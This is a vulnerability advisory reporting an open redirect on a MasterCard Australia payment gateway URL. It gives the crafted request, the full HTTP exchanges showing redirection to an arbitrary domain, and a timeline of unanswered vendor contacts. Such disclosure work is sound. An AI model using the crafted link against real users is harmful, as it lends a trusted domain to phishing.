=======================================================================
MasterCard - Open Redirect
=======================================================================

Affected Domain : mastercard.com.au
Local/Remote  : Remote
Severity  : Very Low
Vulnerable URL   : https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://<any_domain>
Discovered by   : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]

[Summary]

Certain unspecified input is not properly verified before being used. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.

[Vulnerability Details]

GET Request:
------------
GET https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://www.google.com HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET Response:
-------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:26:51 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Set-Cookie: PAY4939831625825013779=PAY8CA6985107791A1B572838CBB73CF5D3; Path=/; Secure
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:56:51 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

Follow up GET Request I:
------------------------
GET https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478 HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response I:
-------------------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:27:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:57:10 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: http://www.google.com?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

GET follow up Request II:
-------------------------
GET http://www.google.com/?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7 HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response II:
--------------------------
HTTP/1.1 302 Found
Location: http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 23 May 2014 12:27:41 GMT
Server: gws
Content-Length: 258
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg">here</A>.
</BODY></HTML>


[Time-line]

23/06/2014 - Advisory created
23/06/2014 - Mastercard notified: no response
25/06/2014 - Vendor contacted again - different department: no response
08/07/2014 - Re-contacted both departments: no response
27/07/2014 - Advisory published